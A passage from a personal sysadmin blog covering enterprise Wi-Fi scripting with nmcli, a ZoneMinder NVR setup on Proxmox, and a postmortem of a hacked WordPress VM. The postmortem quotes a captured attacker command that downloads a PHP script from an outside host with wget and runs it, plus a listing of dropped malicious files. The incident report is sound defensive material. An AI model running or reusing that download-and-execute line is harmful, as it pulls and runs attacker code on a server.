nmcli con modify wlan0 ipv4.dns 8.8.8.8,1.1.1.1
nmcli con modify wlan0 ipv4.gateway 192.168.x.1

# Bring the connection up, then mark the SSID as hidden
nmcli con up "wlan0"
nmcli con modify "wlan0" wifi.hidden yes
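The grep/awk pipeline at the top of the script can be sanity-checked offline against canned `ip -4 --brief address` output. The interface names and addresses below are made up for illustration:

```shell
# Fake `ip -4 --brief address` output: DEVICE  STATE  ADDR/PREFIX
sample='lo               UNKNOWN        127.0.0.1/8
eth0             UP             192.168.1.50/24
wlan0            DOWN'

# Same extraction as the script: first line mentioning 192.168, third column
staticip=$(printf '%s\n' "$sample" | grep -m1 192.168 | awk '{print $3}')
echo "$staticip"   # 192.168.1.50/24
```

Note that the third column keeps the /24 prefix, which is exactly what nmcli's ipv4.address property expects.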

The only part that required trial and error was the sequence in which security and identity information is supplied to the RADIUS server. Every RADIUS setup is different, and what worked in this scenario may not work under a different setup. There also aren't many scripting examples on the internet that deal with enterprise Wi-Fi. All in all, it took me a few hours of reading man pages to come up with this solution.

I hope it brings value to people struggling with similar problems.

Setting up ZoneMinder NVR

For the past year or so, I have been using BlueIris as my network video recorder (NVR) solution on a dedicated HP ProDesk computer running Windows 10. BlueIris has proven to be a solid piece of software. Although I only use a fraction of its features, I still think it is worth the cost (yes, it is paid, proprietary, and Windows-only). I had no plans to replace it any time soon.

That is, until yesterday, when the HP computer just died. It turns out my cat sneaked into the basement a few weeks ago and urinated on my server rack; the liquid got into the case and slowly corroded the motherboard. The desktop was lying horizontally on the top shelf of the rack and caught most of the liquid, saving all the equipment beneath it. Pretty heroic, in a sense.

I took a picture of the dead motherboard.

Well, it was time to pick a new NVR solution (preferably open source) and chug along with life. I had previously tried Shinobi and concluded that its web interface was not to my liking. I had also tried ZoneMinder on an i5 computer back then, but it was simply not powerful enough to drive motion detection on 3+ cameras.

Understanding the pain points

After running security camera systems for more than a year, I have figured out my use case and exactly what I need from an NVR system. I simply need it to:

  • Record 24/7 low-res footage on all cameras
  • Require low maintenance effort
  • Keep CPU usage and disk I/O low (ideally)

What I thought I needed but actually don't:

  • GPU encoding/decoding (pass-through is good enough for me)
  • Motion detection (with cats running around all the time, it generates tons of false triggers)
  • High-res footage (nice to have, but low-res is good enough)
  • Multiple backup copies (footage from weeks ago is not critically important)

With that in mind, I decided to give ZoneMinder another go, this time with a minimum viable configuration.

Deciding the hosting infrastructure

With the HP desktop down, I only have three servers left: a Dell PowerEdge R720 as the main hypervisor, with 8 hard drives in a ZFS mirror vdev configuration; an HP ProLiant DL360p Gen8 as a testing server; and a dedicated backup server running TrueNAS. I'd better not mess around with the backup server, and I don't want to occupy the testing server with mission-critical tasks. The only logical choice is the Dell R720.

ZoneMinder is a PHP web application running on top of a LAMP stack, so it should have no problem running in an LXC container. In fact, this YouTube video shows exactly the same setup. External storage is something we have to configure, though, as discussed later in this post.

Installation

Follow the most recent guide on the ZoneMinder wiki for either Ubuntu or Debian systems: add the apt source list, then install the dependencies and ZoneMinder itself. Fire up a web browser and go to x.x.x.x/zm (or put a proxy in front of it and go to my-zoneminder-url.tld/zm) and you are greeted with a setup wizard. At the time of writing, the most recent stable version is v1.36.12 on Debian 11 Bullseye.

Before running the wizard, I would add external storage to the LXC container. By default, ZoneMinder stores "events" under /var/cache/zoneminder/events, a directory owned by the www-data user and group. In Proxmox, there is a neat trick to bind mount a path on the host system into a guest container. In this case, I created a ZFS dataset /tank/encrypted/zoneminder and bind mounted it to /var/cache/zoneminder/events in the container by adding the following line to the container config file (/etc/pve/lxc/Container_ID.conf):

mp0: /tank/encrypted/zoneminder,mp=/var/cache/zoneminder/events

Reboot the container and the external storage will show up.

We also need to fix the permissions on the storage directory. By default, the www-data user and group have UID and GID 33, which map to 100033 on the host system. We could simply run chown -R 100033:100033 /tank/encrypted/zoneminder on the host and call it a day. But since I already have a ZFS dataset owned by UID/GID 100033 bind mounted into the Nextcloud container, I went the extra mile and changed the UID/GID of the www-data user/group in the ZoneMinder container to a number other than 33. The logic is that if either container is compromised, its www-data user/group cannot touch the other's bind-mounted storage path on the host system. It may sound overly cautious, but reducing the attack surface is always good practice.
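The 33-to-100033 mapping comes from the UID/GID offset that Proxmox applies to unprivileged containers (100000 by default; check /etc/subuid on your host to confirm). As a quick sketch of the arithmetic:

```shell
# Unprivileged LXC containers shift guest UIDs/GIDs by a fixed offset
# (100000 by default in Proxmox). Guest UID 33 (www-data) on the host:
offset=100000
guest_uid=33
host_uid=$((offset + guest_uid))
echo "$host_uid"   # 100033
```

The same formula tells you what to chown on the host for any other in-container user you bind mount storage for.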

Adding Reolink Cameras

I have a total of five Reolink 5MP cameras. This wiki page and this Reddit post show how to add Reolink cameras to ZoneMinder. If in doubt, use ONVIF auto-detection; I find probing much easier than messing around with RTSP/RTMP feed URLs.

Each camera has a sub stream and a main stream. I record the sub streams 24/7 and use the main streams purely as monitors.

For me, the sub feed URL is:

rtsp://admin:password@IP:554/h264Preview_01_sub

The main feed URL is:

rtsp://admin:password@IP:554/h264Preview_01_main

Of course, substitute the username and password based on your setup. The default username for Reolink cameras is "admin"; the default password is empty.
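Since the two URLs differ only in the suffix, they can be templated per camera in shell. The credentials and IP address below are placeholders:

```shell
# Placeholder values; substitute your camera's credentials and address
user="admin"
pass="password"
ip="192.168.1.60"

# Reolink exposes both streams on RTSP port 554 with fixed path suffixes
sub_url="rtsp://${user}:${pass}@${ip}:554/h264Preview_01_sub"
main_url="rtsp://${user}:${pass}@${ip}:554/h264Preview_01_main"
echo "$sub_url"
echo "$main_url"
```

Looping this over a list of camera IPs makes it painless to generate feed URLs for all five cameras at once.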

Wrap-up

I won't go into detail on how to configure ZoneMinder because everyone's needs are different. However, I suggest at least adding a filter rule to purge events when the disk gets full.

Keep an eye on CPU and RAM usage, as ZoneMinder relies on the CPU to do its processing and can get hungry resource-wise. Also pay attention to the usage of the tmpfs at /dev/shm if you have motion detection configured, as it can fill up quickly. The size of the tmpfs can be increased in VMs but not in LXC containers.

That's all I can think of right now. My configuration is minimal; it works for me but may not suit everyone. I am still exploring ZoneMinder myself and may revisit this topic later on.

A Close Call: How a WordPress Site Was Almost Hacked

Background

I have a few spare VMs running in the cloud, waiting to be put to use. These VMs were provisioned using Ansible but are not in production. One of them hosts a WordPress site on a basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that sshd is configured for key authentication only, as any sane person would do.

This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page that came with WordPress, with little to no configuration other than the WP 2FA and W3 Total Cache plug-ins.

How I found out

I occasionally visit the website's URL to check that everything is working. Strangely enough, one day the website was unreachable. I tried to SSH into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I had uninstalled all the diagnostic agent software pre-installed by the cloud provider just to keep the tiny VM lean, so I could not monitor the VM from the dashboard.

After the VM came back from the reboot, the website started to show up and I could SSH in. Everything seemed functional again, but it didn't last long: a few hours later, when I checked in, the same thing happened all over again.

Investigation

After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website was too popular: it is just a blank site with almost zero traffic. The Apache configuration is kept at the defaults; the php-fpm configuration is tuned to the conservative side with very few workers. I started a bench test from another VM using the apache2-utils package:

~$ ab -c30 -t30 'https://example.com/?cat=1'

This command drives 30 concurrent connections from the other VM for up to 30 seconds to stress-test the PHP processing. As expected, the site handled the test just fine, without any significant RAM usage.

As I dug deeper into the process tree, it didn't take long to find that memory was slowly being eaten by PHP processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and the OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service gave the following info:

● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
     Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
     Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
       Docs: man:php-fpm7.4(8)
    Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
   Main PID: 482 (php-fpm7.4)
     Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
      Tasks: 75 (limit: 1128)
     Memory: 773.4M
        CPU: 14min 29.690s
     CGroup: /system.slice/php7.4-fpm.service
             ├─   482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
             ├─   649 php-fpm: pool www
             ├─   750 php-fpm: pool www
             ├─   753 php-fpm: pool www
             ├─   768 php-fpm: pool www
             ├─ 56725 php-fpm: pool www
             ├─ 56736 php-fpm: pool www
             ├─ 56737 php-fpm: pool www
             ├─ 92508 php-fpm: pool www
             ├─ 92528 php-fpm: pool www
             ├─ 92529 php-fpm: pool www
             ├─ 92587 php-fpm: pool www
             ├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
             ├─ 98848 php inc.class.xleet.php
             ├─107565 sh -c php inc.class.xleet.ph

The last three processes immediately sent a chill down my spine. Why is it downloading and executing a PHP script? That is really bad.

A quick ls -lA on the document root:

total 344
-rw-r--r--  1 www-data www-data  8197 Mar  7 15:21 .htaccess
-rwxr-xr-x  1 www-data www-data  2067 Feb 21 20:19 3index.php
-rw-r--r--  1 www-data www-data   362 Feb 16 11:25 accesson.php
-rw-r--r--  1 www-data www-data 16090 Mar  7 16:18 angry.txt
drwxr-xr-x  3 www-data www-data  4096 Feb 22 09:36 assets
-rw-r--r--  1 www-data www-data  1194 Mar  7 16:18 inc.class.xleet.php
-rwxr-xr-x  1 www-data www-data   405 Feb 22 19:35 index.php
-rwxr-xr-x  1 www-data www-data 19915 Mar  7 15:32 license.txt
-rw-r--r--  1 www-data www-data 12484 Mar  7 16:18 list.txt
-rwxr-xr-x  1 www-data www-data  2012 Nov 10 09:31 old-index.php
-rw-r--r--  1 www-data www-data    29 Feb 21 20:19 on.php
-rwxr-xr-x  1 www-data www-data  7437 Mar  7 15:32 readme.html
-rwxr-xr-x  1 www-data www-data   556 Oct 29 23:53 robots.txt
-rw-r--r--  1 www-data www-data 10445 Mar  7 16:18 roll.txt
-rwxr-xr-x  1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r--  1 www-data www-data  1219 Feb 22 19:35 unzip.php
-rwxr-xr-x  1 www-data www-data  2094 Nov 10 10:21 wikindex.php
drwxr-xr-x  8 www-data www-data  4096 Oct 29 16:10 wordpress
-rwxr-xr-x  1 www-data www-data  7165 Jan 20  2021 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Dec 31  1969 wp-admin
-rwxr-xr-x  1 www-data www-data  7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x  1 www-data www-data   351 Feb  6  2020 wp-blog-header.php
-rwxr-xr-x  1 www-data www-data  2338 Feb  1 12:35 wp-comments-post.php
-rwxr-xr-x  1 www-data www-data  3001 Feb  1 12:35 wp-config-sample.php
-rwxr-xr-x  1 www-data www-data  3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data  4096 Mar  7 15:33 wp-content
-rwxr-xr-x  1 www-data www-data  3939 Jul 30  2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb  1 12:35 wp-includes
-rwxr-xr-x  1 www-data www-data  2496 Feb  6  2020 wp-links-opml.php
-rwxr-xr-x  1 www-data www-data  3900 May 15  2021 wp-load.php
-rwxr-xr-x  1 www-data www-data 47916 Feb  1 12:35 wp-login.php
-rwxr-xr-x  1 www-data www-data  8582 Feb  1 12:35 wp-mail.php
-rwxr-xr-x  1 www-data www-data 23025 Feb  1 12:35 wp-settings.php
-rwxr-xr-x  1 www-data www-data 31959 Feb  1 12:35 wp-signup.php
-rwxr-xr-x  1 www-data www-data  4747 Oct  8  2020 wp-trackback.php
-rwxr-xr-x  1 www-data www-data  3236 Jun  8  2020 xmlrpc.php

Clearly some unknown files had been created (like angry.txt), plus the BIG RED ALERT that is inc.class.xleet.php. I tried to delete those files, but they kept popping up. I also noticed the odd permissions in the document root: 755 on regular files seems too open. However, no time to think! I quickly removed the document root entirely and went on to check the system logs for any bigger problem. Luckily, I found no evidence that the VM itself was compromised.
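In hindsight, before wiping a document root like this, it can help to record which files changed recently, since every dropped file in the listing above had a fresh modification time. A quick sketch with GNU find, demonstrated here on a scratch directory rather than a real docroot:

```shell
# Demonstration on a scratch directory; in practice point docroot at the
# real document root (e.g. /var/www/html)
docroot=$(mktemp -d)
touch "$docroot/fresh.php"                      # modified just now
touch -d '10 days ago' "$docroot/stale.php"     # modified long ago

# List regular files modified within the last 2 days: only fresh.php shows up
find "$docroot" -type f -mtime -2 -print
```

Saving that list (plus a tarball of the files) preserves evidence for a postmortem even after the docroot is deleted.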

Back in WordPress land, I downloaded a fresh installer, whose default permissions are conservative (644 for the most part). After extracting it and serving the site again, the PHP scripts did not make a comeback.
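On the permissions point: a common baseline for a WordPress document root is 755 on directories (they need the execute bit to be traversable) and 644 on regular files. A hedged sketch of resetting them with find, demonstrated on a scratch directory:

```shell
# Demonstration on a scratch directory; point docroot at the real document
# root (e.g. /var/www/html) in practice, and double-check before running
docroot=$(mktemp -d)
mkdir -p "$docroot/wp-content"
touch "$docroot/index.php"

# Directories: 755 (traversable); regular files: 644 (not executable)
find "$docroot" -type d -exec chmod 755 {} +
find "$docroot" -type f -exec chmod 644 {} +

stat -c '%a %n' "$docroot/wp-content" "$docroot/index.php"
```

Many guides additionally tighten wp-config.php to 640 or 600, since it contains database credentials.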

Postmortem

I am not a security expert, but this incident was serious enough for me to reflect and learn a lesson. The most likely scenario is that the file permissions in the document root were too open, and either the www-data user or the php-fpm process was compromised as a result.

It ultimately came down to a misconfiguration in my Ansible playbook, which extracts the WordPress tarball and resets the permissions to 755. Thank goodness this was the only affected machine, as the other WordPress sites I administer were set up by hand.

Lastly, I removed this VM entirely as a precaution.

Takeaways

There are three lessons I learned:

  1. When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
  2. Don't mess with default permissions for no good reason
  3. Examine automation code carefully before pushing it; convenience can be a double-edged sword